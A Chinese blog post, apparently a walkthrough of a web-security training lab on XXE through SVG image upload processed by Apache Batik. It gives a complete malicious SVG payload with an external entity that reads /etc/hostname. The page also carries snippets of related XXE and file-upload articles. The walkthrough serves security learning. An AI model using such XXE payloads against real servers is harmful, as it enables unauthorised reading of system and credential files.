Lab: Exploiting XXE via image file upload :通过上传图片文件利用 XXE

最新推荐文章于 2024-06-18 17:09:48 发布
最新推荐文章于 2024-06-18 17:09:48 发布
阅读量397 收藏
点赞数
文章标签: java linux svg hadoop spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793640
版权

通过文件上传的 XXE 攻击

一些应用程序允许用户上传文件,然后在服务器端进行处理。一些常见的文件格式使用 XML 或包含 XML 子组件。基于 XML 的格式的示例是办公文档格式(如 DOCX)和图像格式(如 SVG)。

例如,应用程序可能允许用户上传图像,并在上传后在服务器上处理或验证这些图像。即使应用程序希望接收 PNG 或 JPEG 等格式,所使用的图像处理库也可能支持 SVG 图像。由于 SVG 格式使用 XML,攻击者可以提交恶意的 SVG 图像,从而达到 XXE 漏洞的隐藏攻击面。

实验室

该实验室允许用户将头像附加到评论中,并使用 Apache Batik 库来处理头像图像文件。

要解决实验室问题,请上传/etc/hostname处理后显示文件内容的图像。然后使用“提交解决方案”按钮提交服务器主机名的值。

使用以下内容创建本地 SVG 图像:<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
在博客文章上发表评论,并上传此图片作为头像。image
查看评论时,您应该会/etc/hostname在图像中看到文件的内容。使用“提交解决方案”按钮提交服务器主机名的值。image

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1314
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
Probabilistic graphlet cut: Exploiting spatial structure cue for weakly supervised image segmentation
02-09
Probabilistic graphlet cut: Exploiting spatial structure cue for weakly supervised image segmentation
pikachu-文件上传+XXE+不安全的url跳转
qq_47804678的博客
03-22 304
们可以看到,刚把文件上传,还没有点击“开始上传”就已将弹出了警示框,没有交互就已经检测了文件的类型,说明他是在前端进行校验的。那么我们看一下代码:选择浏览,可以看到代码中有一个checkfiletxt()的函数:我们尝试看一下这个函数,果然是他,然后把onchange值改为空,将这个函数删除:再次尝试上传php文件,发现成功上传。(但是只要重新刷新页面,代码就会恢复。服务端check尝试上传php文件,点击上传发现禁止上传,提示只能是图片格式:是一种标准化的方式来表示文档的性质和格式。
XXE漏洞安全-全网最详细讲解】
最新发布
baimao__Ch的博客
06-18 309
Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(externalentity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD(Document Type。
(翻译)一种xxe盲打的骚姿势,通过在上传的文件中得到结果
qq_36093477的博客
09-26 2467
背景 在之前的报道中,我们了解了很多关系在访问者浏览器执行代码;反射的xss和储存的xss。此外,我们快速查看配置错误的服务器设置和打开重定向。 今天我们将仔细研究从服务器窃取私人文件。 挑选一个目标 一如既往,我们需要一个好的目标。一个在荷兰的最大的电子商务网站 Bol.com。他们处理我的开放重定向错误报告的方式非常好。快速回复,正确修复并始终向我发送更新。没有麻烦,没有NDA,快乐的语气。公...
文件上传xlsx之XXE漏洞
LAngle9的博客
11-18 2127
1 新建一个excel文件2 修改后缀名为.zip格式3解压缩出文件夹4 文件结构如下,可以进行修改,给excel添加一些功能键可结合VBA添加事件。5修改完成后,全选文件,进行压缩。注:不要选sss文件夹来压缩,要全选文件。6 压缩文件格式选择.zip格式。7产生压缩文件8 修改后缀名9 打开文件成功,看到之前在。excel 修改设置(将excel修改后缀名,解压缩方式)_下雨了620的博客-CSDN博客_excel改为rar后没有xl。使用BURP的dnslog地址看是是否有回显。
VINCE: Exploiting Visible Light Sensing for Smartphone-based NFC Systems
02-09
VINCE encodes information as different brightness levels of smartphone screens, while receivers capture the light signal via light sensors. We experimentally profile the impact of screen brightness ...
Breaking_Samsung's_Root_of_Trust:Exploiting_Samsung
08-28
【Breaking Samsung's Root of Trust:Exploiting Samsung S10 Secure Boot】是一个关于网络安全和系统安全的议题,主要探讨了如何突破三星S10设备的安全启动机制,即Samsung S-Boot。这一议题对于理解现代移动设备...
Social Attribute-aware Force Model: Exploiting Richness of Interaction for AbnormalCrowd Detection
02-07
### Social Attribute-aware Force Model: Exploiting Richness of Interaction for Abnormal Crowd Detection #### 概述 本研究提出了一种社会属性感知力模型(Social Attribute-aware Force Model),旨在通过捕捉...
Triplex transfer learning: Exploiting both shared and distinct concepts for text classification
02-10
Triplex transfer learning: Exploiting both shared and distinct concepts for text classification
上传 xls、xlsx
weixin_44286765的博客
04-26 596
<template> <div> <div> <div class="upfiles"> <div class="upbox"> <div class="upTitle"> <p> 上传填好的找好信息表,文件后缀必须为xls或xlsx,文件大小不的大于10M </p>
跟bWAPP学WEB安全(PHP代码)--终结篇:文件目录遍历、文件上传、SSRF、CSRF、XXE文件包含...
weixin_30585437的博客
02-11 559
前言 过年过的很不顺,家里领导和我本人接连生病,年前腊月29才都治好出院,大年初六家里的拉布拉多爱犬又因为细小医治无效离开了,没能过年回家,花了好多钱,狗狗还离世了。所以也就没什么心思更新博客。今天初七,正式上班了,更新一篇吧,把bWAPP中常见的web漏洞也就一次性更新完毕,完成这个系列,虽然有点虎头蛇尾,但是也颇感无奈了。去年立的flag也还有两个大系列没有完成,一个是互联网公司常见漏洞分...
【Web安全】XXE漏洞
zkaqlaoniao的博客
11-24 309
XXE漏洞指的是XML外部实体注入(XML External Entity Injection)漏洞,它是一种常见的安全漏洞类型,可以用来攻击基于XML的应用程序。当应用程序接受XML输入时,攻击者可以插入带有外部实体引用的恶意XML数据,从而导致应用程序执行未经授权的操作,比如访问本地文件系统、执行远程代码等。攻击者可以通过利用XXE漏洞来获取敏感信息、控制服务器,或者执行其他恶意操作。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6453
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE漏洞中DOCTYPE、ENTITY傻傻分不清-WEB安全基础入门—XML外部实体注入(XXE)_xxe 用eneity不行
2401_84185182的博客
04-28 1032
也可以采用file://协议,读取文件。注意路径前是三个///在此提前点出,XML外部实体是XML外部实体攻击的主要利用点。
从一道题目学习XXE漏洞
蚁景网安学院
03-01 516
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml定
典型漏洞归纳之上传漏洞
weixin_30911451的博客
02-21 1768
0x01 概要说明 文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。 from : http:/...
网络打印机安全研究:Exploiting Network Printers
"藏经阁-Exploiting Network Printers.pdf" 该文档主要探讨了网络打印机的安全问题及其利用方法,由Jens Müller、Vladislav Mladenov、Juraj Somorovsky和Jörg Schwenk撰写。文章分为背景、攻击、评估、PRET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值